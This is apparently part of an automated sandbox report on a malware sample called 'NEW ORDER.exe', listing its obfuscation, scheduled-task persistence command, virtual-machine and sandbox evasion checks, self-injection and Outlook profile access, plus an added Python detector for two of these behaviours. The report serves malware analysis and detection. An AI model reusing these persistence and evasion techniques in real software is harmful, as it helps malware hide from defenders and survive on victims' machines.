                  Source: C:\Users\user\Desktop\NEW ORDER.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                  Source: NEW ORDER.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: NEW ORDER.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                  Data Obfuscation

                  barindex
                  Source: NEW ORDER.exe, ?QnN??lK?/??EFdowRHI?n?.cs.Net Code: NewLateBinding.LateCall(Bp?SUT???, null, "Invoke", stackVariable4, null, null, stackVariable13, true)
                  Source: HvabCK.exe.0.dr, ?QnN??lK?/??EFdowRHI?n?.cs.Net Code: NewLateBinding.LateCall(Bp?SUT???, null, "Invoke", stackVariable4, null, null, stackVariable13, true)
                  Source: 0.0.NEW ORDER.exe.960000.0.unpack, ?QnN??lK?/??EFdowRHI?n?.cs.Net Code: NewLateBinding.LateCall(Bp?SUT???, null, "Invoke", stackVariable4, null, null, stackVariable13, true)
                  Source: C:\Users\user\Desktop\NEW ORDER.exeCode function: 0_2_078B3CC5 push esp; retf
                  Source: C:\Users\user\Desktop\NEW ORDER.exeCode function: 7_2_060F2058 push ebp; retf
                  Source: C:\Users\user\Desktop\NEW ORDER.exeCode function: 7_2_060F2648 push edi; retf
                  Source: C:\Users\user\Desktop\NEW ORDER.exeCode function: 7_2_060F8E68 pushfd ; retf
                  Source: C:\Users\user\Desktop\NEW ORDER.exeCode function: 7_2_060F268B push edi; retf
                  Source: C:\Users\user\Desktop\NEW ORDER.exeCode function: 7_2_060F2698 push edi; retf
                  Source: C:\Users\user\Desktop\NEW ORDER.exeCode function: 7_2_060F26DB push edi; retf
                  Source: C:\Users\user\Desktop\NEW ORDER.exeCode function: 7_2_060F26E8 push edi; retf
                  Source: C:\Users\user\Desktop\NEW ORDER.exeCode function: 7_2_060F2788 push edi; retf
                  Source: C:\Users\user\Desktop\NEW ORDER.exeCode function: 7_2_060F27CB push edi; retf
                  Source: C:\Users\user\Desktop\NEW ORDER.exeCode function: 7_2_060FE4B0 push esp; ret
                  Source: C:\Users\user\Desktop\NEW ORDER.exeCode function: 7_2_060F24E8 push esi; retf
                  Source: C:\Users\user\Desktop\NEW ORDER.exeCode function: 7_2_060F2599 push edi; retf
                  Source: C:\Users\user\Desktop\NEW ORDER.exeCode function: 7_2_060FCA93 push eax; retf
                  Source: C:\Users\user\Desktop\NEW ORDER.exeCode function: 7_2_060F22EB push ebp; retf
                  Source: C:\Users\user\Desktop\NEW ORDER.exeCode function: 7_2_060F3B29 pushad ; retf
                  Source: C:\Users\user\Desktop\NEW ORDER.exeCode function: 7_2_060F3B88 pushad ; retf
                  Source: C:\Users\user\Desktop\NEW ORDER.exeCode function: 7_2_060F23E3 push ebp; retf
                  Source: C:\Users\user\Desktop\NEW ORDER.exeCode function: 7_2_060F23E0 push ebp; retf
                  Source: C:\Users\user\Desktop\NEW ORDER.exeCode function: 7_2_060F281B push edi; retf
                  Source: C:\Users\user\Desktop\NEW ORDER.exeCode function: 7_2_060F2828 push edi; retf
                  Source: C:\Users\user\Desktop\NEW ORDER.exeCode function: 7_2_060F28C8 push edi; retf
                  Source: C:\Users\user\Desktop\NEW ORDER.exeCode function: 7_2_060F2918 push edi; retf
                  Source: C:\Users\user\Desktop\NEW ORDER.exeCode function: 7_2_0612165E push es; ret
                  Source: C:\Users\user\Desktop\NEW ORDER.exeCode function: 7_2_06121662 push es; ret
                  Source: C:\Users\user\Desktop\NEW ORDER.exeCode function: 7_2_0612166A push es; ret
                  Source: C:\Users\user\Desktop\NEW ORDER.exeCode function: 7_2_0612169A push es; ret
                  Source: C:\Users\user\Desktop\NEW ORDER.exeCode function: 7_2_0612169E push es; ret
                  Source: C:\Users\user\Desktop\NEW ORDER.exeCode function: 7_2_061216B2 push es; ret
                  Source: C:\Users\user\Desktop\NEW ORDER.exeCode function: 7_2_061216B6 push es; ret
                  Source: C:\Users\user\Desktop\NEW ORDER.exeCode function: 7_2_061216BA push es; ret
                  Source: initial sampleStatic PE information: section name: .text entropy: 7.7728861482664335
                  Source: C:\Users\user\Desktop\NEW ORDER.exeFile created: C:\Users\user\AppData\Roaming\HvabCK.exe

                  Boot Survival

                  barindex
                  Source: C:\Users\user\Desktop\NEW ORDER.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HvabCK" /XML "C:\Users\user\AppData\Local\Temp\tmp2F70.tmp
                  Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX

                  Malware Analysis System Evasion

                  barindex
                  Source: Yara matchFile source: Process Memory Space: NEW ORDER.exe PID: 4932, type: MEMORYSTR
                  Source: NEW ORDER.exe, 00000000.00000002.270184623.0000000002E71000.00000004.00000800.00020000.00000000.sdmp, NEW ORDER.exe, 00000000.00000002.272904701.00000000030CD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
                  Source: NEW ORDER.exe, 00000000.00000002.270184623.0000000002E71000.00000004.00000800.00020000.00000000.sdmp, NEW ORDER.exe, 00000000.00000002.272904701.00000000030CD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                  Source: C:\Users\user\Desktop\NEW ORDER.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                  Source: C:\Users\user\Desktop\NEW ORDER.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                  Source: C:\Users\user\Desktop\NEW ORDER.exe TID: 1396Thread sleep time: -1844674407370954s >= -30000s
                  Source: C:\Users\user\Desktop\NEW ORDER.exe TID: 1556Thread sleep count: 9759 > 30
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Users\user\Desktop\NEW ORDER.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\Desktop\NEW ORDER.exeWindow / User API: threadDelayed 9759
                  Source: C:\Users\user\Desktop\NEW ORDER.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Users\user\Desktop\NEW ORDER.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Users\user\Desktop\NEW ORDER.exeProcess information queried: ProcessInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exeThread delayed: delay time: 922337203685477
                  Source: NEW ORDER.exe, 00000000.00000002.272904701.00000000030CD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware SVGA IIOData Source=localhost\sqlexpress;Initial Catalog=dbSMS;Integrated Security=True
                  Source: NEW ORDER.exe, 00000000.00000002.272904701.00000000030CD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
                  Source: NEW ORDER.exe, 00000000.00000002.272904701.00000000030CD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                  Source: NEW ORDER.exe, 00000000.00000002.272904701.00000000030CD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
                  Source: NEW ORDER.exe, 00000000.00000002.272904701.00000000030CD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWARE
                  Source: NEW ORDER.exe, 00000000.00000002.272904701.00000000030CD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                  Source: NEW ORDER.exe, 00000000.00000002.272904701.00000000030CD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
                  Source: NEW ORDER.exe, 00000000.00000002.272904701.00000000030CD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware SVGA II
                  Source: NEW ORDER.exe, 00000000.00000002.272904701.00000000030CD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
                  Source: NEW ORDER.exe, 00000007.00000002.504032393.0000000006740000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlloo
                  Source: C:\Users\user\Desktop\NEW ORDER.exeProcess token adjusted: Debug
                  Source: C:\Users\user\Desktop\NEW ORDER.exeCode function: 7_2_060F4460 LdrInitializeThunk,
                  Source: C:\Users\user\Desktop\NEW ORDER.exeMemory allocated: page read and write | page guard

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Memory written: C:\Users\user\Desktop\NEW ORDER.exe base: 400000 value starts with: 4D5A
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HvabCK" /XML "C:\Users\user\AppData\Local\Temp\tmp2F70.tmp"
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Process created: C:\Users\user\Desktop\NEW ORDER.exe {path}
                  Source: C:\Windows\System32\svchost.exe | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 488 -p 1468 -ip 1468
                  Source: C:\Windows\System32\svchost.exe | Process created: unknown unknown
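The rows above record two behaviours a triage analyst would pair: the sample launches a second copy of its own image and writes a PE (bytes starting 4D5A, "MZ") at the child's image base 0x400000, and it registers a scheduled task from an XML file dropped in the user's Temp directory. The Python below is an added detection example, not part of the report or the sample: the event dicts are constructed telemetry with assumed field names, and the pids and the written bytes are invented. The WerFault row is the crash handler for pid 1468 and is deliberately not matched.

```python
"""Triage rules for the evasion/persistence rows above.

Added example, not part of the Joe Sandbox report or the sample. Events are
constructed dicts shaped loosely like EDR process/memory telemetry; the field
names (type, pid, image, parent_image, cmdline, source_image, target_pid,
base, data) are an assumption.
"""
import re
from collections import defaultdict

# schtasks.exe registering a task from an XML file under the user's Temp directory.
SCHTASKS_XML = re.compile(
    r"schtasks(?:\.exe)?\"?\s+/create\b.*?/xml\s+\"?(?P<xml>[^\"]+?AppData\\Local\\Temp\\[^\"\s]+)",
    re.IGNORECASE,
)
TASK_NAME = re.compile(r"/tn\s+\"?(?P<tn>[^\"]+)\"?", re.IGNORECASE)


def schtasks_from_temp(cmdline):
    """Return (task name, xml path) when cmdline creates a task from a Temp XML, else None."""
    m = SCHTASKS_XML.search(cmdline)
    if not m:
        return None
    tn = TASK_NAME.search(cmdline)
    return (tn.group("tn") if tn else None, m.group("xml"))


def self_injection(events):
    """Find a process that spawns its own image and then writes an MZ header at the
    child's image base: the pattern behind 'Memory written ... base: 400000 ... 4D5A'."""
    children = defaultdict(set)  # parent image -> pids of children with the same image
    for e in events:
        if e["type"] == "process_create" and e["image"].lower() == e["parent_image"].lower():
            children[e["parent_image"].lower()].add(e["pid"])
    hits = []
    for e in events:
        if e["type"] != "memory_write":
            continue
        same_image_child = e["target_pid"] in children[e["source_image"].lower()]
        if same_image_child and e["base"] == 0x400000 and e["data"].startswith(b"MZ"):
            hits.append((e["source_image"], e["target_pid"]))
    return hits


def triage(events):
    """Run both rules and return a list of (rule, actor, detail) alerts."""
    alerts = []
    for e in events:
        if e["type"] == "process_create":
            hit = schtasks_from_temp(e["cmdline"])
            if hit:
                alerts.append(("scheduled task from Temp XML", e["parent_image"], hit))
    for src, pid in self_injection(events):
        alerts.append(("self-injection: MZ written to child image base", src, pid))
    return alerts


# Constructed events mirroring the report rows (pids and data bytes are invented).
SAMPLE = "C:\\Users\\user\\Desktop\\NEW ORDER.exe"
EVENTS = [
    {"type": "process_create", "pid": 1468, "image": SAMPLE,
     "parent_image": "C:\\Windows\\explorer.exe", "cmdline": f"\"{SAMPLE}\""},
    {"type": "process_create", "pid": 2200, "image": "C:\\Windows\\SysWOW64\\schtasks.exe",
     "parent_image": SAMPLE,
     "cmdline": "\"C:\\Windows\\System32\\schtasks.exe\" /Create /TN \"Updates\\HvabCK\" "
                "/XML \"C:\\Users\\user\\AppData\\Local\\Temp\\tmp2F70.tmp\""},
    {"type": "process_create", "pid": 2300, "image": SAMPLE, "parent_image": SAMPLE,
     "cmdline": f"\"{SAMPLE}\""},
    {"type": "memory_write", "source_image": SAMPLE, "target_pid": 2300, "base": 0x400000,
     "data": b"MZ\x90\x00" + b"\x00" * 60},
    # A write elsewhere in the same child must not fire the injection rule.
    {"type": "memory_write", "source_image": SAMPLE, "target_pid": 2300, "base": 0x7FF000,
     "data": b"\x00" * 64},
]

if __name__ == "__main__":
    for alert in triage(EVENTS):
        print(alert)
```

The task rule keys on the XML path rather than the task name, because names like "Updates\HvabCK" vary per build while the tmpXXXX.tmp-in-Temp pattern does not; the injection rule requires the same-image parent/child relationship so that a legitimate debugger or installer writing to a foreign process is not matched by the MZ check alone.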
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Users\user\Desktop\NEW ORDER.exe VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\NEW ORDER.exe | Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
